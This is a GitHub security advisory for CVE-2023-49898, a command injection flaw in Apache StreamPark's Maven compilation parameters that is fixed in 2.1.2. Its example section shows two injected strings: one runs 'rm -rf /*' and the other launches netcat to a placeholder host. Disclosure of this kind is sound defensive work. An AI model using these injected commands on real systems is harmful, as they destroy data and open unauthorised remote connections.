Skip to content

Apache StreamPark: Authenticated system users could trigger remote command execution

Critical severity GitHub Reviewed Published Dec 15, 2023 to the GitHub Advisory Database • Updated Dec 16, 2023

Package

maven org.apache.streampark:streampark (Maven)

Affected versions

>= 2.0.0, < 2.1.2

Patched versions

2.1.2

Description

In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.

Mitigation:

all users should upgrade to 2.1.2

Example:

##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":

/usr/share/java/maven-3/conf/settings.xml || rm -rf /*

/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

References

Published by the National Vulnerability Database Dec 15, 2023
Published to the GitHub Advisory Database Dec 15, 2023
Reviewed Dec 16, 2023
Last updated Dec 16, 2023

Severity

Critical

EPSS score

0.069%
(32nd percentile)

Weaknesses

CVE ID

CVE-2023-49898

GHSA ID

GHSA-qg44-xqwj-wc28
Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.